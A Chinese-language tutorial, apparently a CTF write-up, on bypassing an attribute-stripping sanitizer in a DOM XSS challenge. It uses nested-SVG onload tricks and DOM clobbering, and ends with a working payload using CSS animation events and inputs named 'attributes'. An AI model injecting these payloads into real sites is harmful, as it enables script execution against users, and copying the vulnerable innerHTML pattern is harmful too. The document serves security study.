XSS-DOM

文章目录

源码

html 复制代码
<script>
 const data = decodeURIComponent(location.hash.substr(1));;
 const root = document.createElement('div');
 root.innerHTML = data;
 
 // 这里模拟了XSS过滤的过程,方法是移除所有属性,sanitizer
 for (let el of root.querySelectorAll('*')) {
  let attrs = [];
  for (let attr of el.attributes) {
   attrs.push(attr.name);
  }
  for (let name of attrs) {
   el.removeAttribute(name);
  }
 }    
  document.body.appendChild(root); 
 
</script>

可以明显的看到这是个DOM XSS,用户的输入会构成一个新div元素的子结点,但在插入body之前会被移除所有的属性。

当尝试输入弹窗警告代码时,没有反应-在执行前属性被删除了。

SVG标签

HTML树型结构

在文档中的script标签会阻塞DOM的构造。

先注释掉过滤代码,此时正常弹窗

payload:<svg><svg src=1 onload=alert(1)></svg>

最内层的svg先触发,然后再到下一层,而且是在DOM树构建完成以前就触发了相关事件。

Dom-Clobbring

采用DOM劫持

html 复制代码
    <img id="x">
    <img name="y">
    <script>
        console.log(x);
        console.log(y);
        console.log(document.x);
        console.log(document.y);
        console.log(window.x);
        console.log(window.y);
    </script>

我们可以通过这种方式去创建或者覆盖 document 或者 window 对象的某些值,但是看起来我们举的例子只是利用标签创建或者覆盖最终得到的也是标签,是一个HTMLElment对象。

但是对于大多数情况来说,我们可能更需要将其转换为一个可控的字符串类型,以便我们进行操作。

tostring

php 复制代码
Object.getOwnPropertyNames(window) 
.filter(p => p.match(/Element$/)) 
.map(p => window[p])  
.filter(p => p && p.prototype && p.prototype.toString !== Object.prototype.toString)

我们可以得到两种标签对象:

HTMLAreaElement ()& HTMLAnchorElement (<a>),利用href属性来进行字符串转换。

html 复制代码
<body>
    <a id="test" href="http://xianoupeng.com">aaa</a>
</body>
<script>
    alert(test)
</script>

引入name属性:

html 复制代码
    <div id=x>
        <a id=y href='www.xianoupeng.com'></a>
    </div>
    <script>
        alert(x.y);
    </script>

使用payload:<style>@keyframes x{}</style><form style="animation-name: x" onanimationstart="alert(1)"><input id=attributes><input id=attributes>解决最初的问题

相关推荐
遂心_7 小时前
为什么 '1'.toString() 可以调用?深入理解 JavaScript 包装对象机制
前端·javascript
IT_陈寒7 小时前
JavaScript 性能优化:5 个被低估的 V8 引擎技巧让你的代码快 200%
前端·人工智能·后端
王同学QaQ8 小时前
Vue3对接UE,通过MQTT完成通讯
javascript·vue.js
岛风风8 小时前
关于手机的设备信息
前端
ReturnTrue8688 小时前
nginx性能优化之Gzip
前端
程序员鱼皮8 小时前
刚刚 Java 25 炸裂发布!让 Java 再次伟大
java·javascript·计算机·程序员·编程·开发·代码
w_y_fan9 小时前
Flutter 滚动组件总结
前端·flutter
wuli金居哇9 小时前
我用 Turborepo 搭了个 Monorepo 脚手架,开发体验直接起飞!
前端
Asort9 小时前
JavaScript 从零开始(五):运算符和表达式——从零开始掌握算术、比较与逻辑运算
前端·javascript
一枚前端小能手9 小时前
🚀 缓存用错了网站更慢?前端缓存策略的5个致命误区
前端·javascript